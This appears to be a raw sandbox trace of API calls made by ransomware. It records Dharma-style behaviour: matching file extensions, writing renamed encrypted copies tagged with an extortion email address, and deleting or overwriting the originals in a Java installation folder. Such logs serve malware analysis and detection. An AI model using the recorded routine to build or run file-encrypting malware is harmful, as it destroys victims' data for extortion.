[0200.654] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.654] lstrlenW (lpString=".docx") returned 5 [0200.654] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0200.654] lstrlenW (lpString=".pdf") returned 4 [0200.654] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.654] lstrlenW (lpString=".xls") returned 4 [0200.654] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.654] lstrlenW (lpString=".xlsx") returned 5 [0200.654] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0200.654] lstrlenW (lpString=".ppt") returned 4 [0200.654] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.655] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.655] lstrlenW (lpString=".zip") returned 4 [0200.655] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.655] lstrlenW (lpString=".rar") returned 4 [0200.655] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.655] lstrlenW (lpString=".bz2") returned 4 [0200.655] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.655] lstrlenW (lpString=".7z") returned 3 [0200.655] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.655] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.655] lstrlenW (lpString=".dbf") returned 4 [0200.655] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.655] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.655] lstrlenW (lpString=".1cd") returned 4 [0200.655] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.655] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 49 [0200.655] lstrlenW (lpString=".jpg") returned 4 [0200.655] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.655] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0200.655] lstrlenW (lpString="zip.dll") returned 7 [0200.655] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0200.656] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=77888) returned 1 [0200.656] CloseHandle (hObject=0x338) returned 1 [0200.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll")) returned 0x20 [0200.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0200.656] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0200.656] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.657] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.657] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0200.657] GetLastError () returned 0x0 [0200.657] ReadFile (in: hFile=0x338, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x13040, lpOverlapped=0x0) returned 1 [0201.694] WriteFile (in: hFile=0x380, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x13050, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x13050, lpOverlapped=0x0) returned 1 [0201.696] ReadFile (in: hFile=0x338, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.696] WriteFile (in: hFile=0x380, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe2, lpOverlapped=0x0) returned 1 [0201.696] SetEndOfFile (hFile=0x380) returned 1 [0201.696] CloseHandle (hObject=0x380) returned 1 [0201.696] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.696] SetEndOfFile (hFile=0x338) returned 1 [0201.698] CloseHandle (hObject=0x338) returned 1 [0201.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.698] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll")) returned 1 [0201.698] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.698] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.698] lstrlenW (lpString=".doc") returned 4 [0201.698] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.698] lstrlenW (lpString=".docx") returned 5 [0201.698] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0201.698] lstrlenW (lpString=".pdf") returned 4 [0201.698] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.699] lstrlenW (lpString=".xls") returned 4 [0201.699] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.699] lstrlenW (lpString=".xlsx") returned 5 [0201.699] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0201.699] lstrlenW (lpString=".ppt") returned 4 [0201.699] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.699] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.699] lstrlenW (lpString=".zip") returned 4 [0201.699] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.699] lstrlenW (lpString=".rar") returned 4 [0201.699] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.699] lstrlenW (lpString=".bz2") returned 4 [0201.699] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.699] lstrlenW (lpString=".7z") returned 3 [0201.699] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.699] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.699] lstrlenW (lpString=".dbf") returned 4 [0201.699] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.699] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.699] lstrlenW (lpString=".1cd") returned 4 [0201.699] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.699] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.699] lstrlenW (lpString=".jpg") returned 4 [0201.699] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.699] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.699] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.699] lstrlenW (lpString=".doc") returned 4 [0201.699] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.699] lstrlenW (lpString=".docx") returned 5 [0201.700] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0201.700] lstrlenW (lpString=".pdf") returned 4 [0201.700] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.700] lstrlenW (lpString=".xls") returned 4 [0201.700] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.700] lstrlenW (lpString=".xlsx") returned 5 [0201.700] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0201.700] lstrlenW (lpString=".ppt") returned 4 [0201.700] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.700] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.700] lstrlenW (lpString=".zip") returned 4 [0201.700] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.700] lstrlenW (lpString=".rar") returned 4 [0201.700] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.700] lstrlenW (lpString=".bz2") returned 4 [0201.700] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.700] lstrlenW (lpString=".7z") returned 3 [0201.700] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.700] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.700] lstrlenW (lpString=".dbf") returned 4 [0201.700] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.700] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.700] lstrlenW (lpString=".1cd") returned 4 [0201.700] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.700] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 46 [0201.700] lstrlenW (lpString=".jpg") returned 4 [0201.700] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.701] lstrcmpiW (lpString1=".jar", lpString2=".bat") returned 1 [0201.701] lstrlenW (lpString="charsets.jar") returned 12 [0201.701] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0201.701] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=3036922) returned 1 [0201.701] CloseHandle (hObject=0x338) returned 1 [0201.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar")) returned 0x20 [0201.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.702] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0201.703] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0201.703] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc64 | out: lpNewFilePointer=0x0) returned 1 [0201.703] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0201.703] ReadFile (in: hFile=0x338, lpBuffer=0x4049058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x4049058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0201.767] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0xf7253, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0201.767] ReadFile (in: hFile=0x338, lpBuffer=0x4089058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x4089058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0201.819] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x361fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0201.819] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x2a56fa, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0201.819] ReadFile (in: hFile=0x338, lpBuffer=0x40c9058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x40c9058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0201.888] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.888] WriteFile (in: hFile=0x338, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x361fca8, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fca8*=0xc0104, lpOverlapped=0x0) returned 1 [0202.152] SetEndOfFile (hFile=0x338) returned 1 [0202.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40000) returned 0x44350b8 [0202.155] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0202.155] WriteFile (in: hFile=0x338, lpBuffer=0x44350b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44350b8*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0202.157] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0xf7253, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0202.157] WriteFile (in: hFile=0x338, lpBuffer=0x44350b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44350b8*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0202.162] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x2a56fa, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0202.162] WriteFile (in: hFile=0x338, lpBuffer=0x44350b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44350b8*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0202.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0202.164] CloseHandle (hObject=0x338) returned 1 [0202.164] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.164] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.164] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.164] lstrlenW (lpString=".doc") returned 4 [0202.164] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0202.164] lstrlenW (lpString=".docx") returned 5 [0202.164] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0202.164] lstrlenW (lpString=".pdf") returned 4 [0202.164] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0202.165] lstrlenW (lpString=".xls") returned 4 [0202.165] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0202.165] lstrlenW (lpString=".xlsx") returned 5 [0202.165] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0202.165] lstrlenW (lpString=".ppt") returned 4 [0202.165] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0202.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.165] lstrlenW (lpString=".zip") returned 4 [0202.165] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0202.165] lstrlenW (lpString=".rar") returned 4 [0202.165] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0202.165] lstrlenW (lpString=".bz2") returned 4 [0202.165] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0202.165] lstrlenW (lpString=".7z") returned 3 [0202.165] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0202.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.165] lstrlenW (lpString=".dbf") returned 4 [0202.165] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0202.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.165] lstrlenW (lpString=".1cd") returned 4 [0202.165] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0202.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.165] lstrlenW (lpString=".jpg") returned 4 [0202.165] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0202.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.165] lstrlenW (lpString=".doc") returned 4 [0202.165] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0202.165] lstrlenW (lpString=".docx") returned 5 [0202.165] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0202.166] lstrlenW (lpString=".pdf") returned 4 [0202.166] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0202.166] lstrlenW (lpString=".xls") returned 4 [0202.166] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0202.166] lstrlenW (lpString=".xlsx") returned 5 [0202.166] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0202.166] lstrlenW (lpString=".ppt") returned 4 [0202.166] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0202.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.166] lstrlenW (lpString=".zip") returned 4 [0202.166] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0202.166] lstrlenW (lpString=".rar") returned 4 [0202.166] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0202.166] lstrlenW (lpString=".bz2") returned 4 [0202.166] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0202.166] lstrlenW (lpString=".7z") returned 3 [0202.166] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0202.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.166] lstrlenW (lpString=".dbf") returned 4 [0202.166] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0202.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.166] lstrlenW (lpString=".1cd") returned 4 [0202.166] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0202.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0202.166] lstrlenW (lpString=".jpg") returned 4 [0202.166] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0202.166] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0202.166] lstrlenW (lpString="messages_it.properties") returned 22 [0202.166] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0202.167] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=3223) returned 1 [0202.167] CloseHandle (hObject=0x338) returned 1 [0202.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties")) returned 0x20 [0202.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.167] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0202.167] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.167] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.167] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0202.168] GetLastError () returned 0x0 [0202.168] ReadFile (in: hFile=0x338, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0xc97, lpOverlapped=0x0) returned 1 [0202.200] WriteFile (in: hFile=0x380, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xca0, lpOverlapped=0x0) returned 1 [0202.201] ReadFile (in: hFile=0x338, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0202.201] WriteFile (in: hFile=0x380, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x100, lpOverlapped=0x0) returned 1 [0202.201] SetEndOfFile (hFile=0x380) returned 1 [0202.202] CloseHandle (hObject=0x380) returned 1 [0202.202] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.202] SetEndOfFile (hFile=0x338) returned 1 [0202.202] CloseHandle (hObject=0x338) returned 1 [0202.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.203] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties")) returned 1 [0202.203] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.203] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.203] lstrlenW (lpString=".doc") returned 4 [0202.203] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString=".docx") returned 5 [0202.204] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.204] lstrlenW (lpString=".pdf") returned 4 [0202.204] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString=".xls") returned 4 [0202.204] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString=".xlsx") returned 5 [0202.204] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.204] lstrlenW (lpString=".ppt") returned 4 [0202.204] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.204] lstrlenW (lpString=".zip") returned 4 [0202.204] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString=".rar") returned 4 [0202.204] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString=".bz2") returned 4 [0202.204] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString=".7z") returned 3 [0202.204] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.204] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.204] lstrlenW (lpString=".dbf") returned 4 [0202.204] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.204] lstrlenW (lpString=".1cd") returned 4 [0202.204] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.204] lstrlenW (lpString=".jpg") returned 4 [0202.204] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.204] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.205] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0202.205] lstrlenW (lpString=".doc") returned 4 [0202.205] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.205] 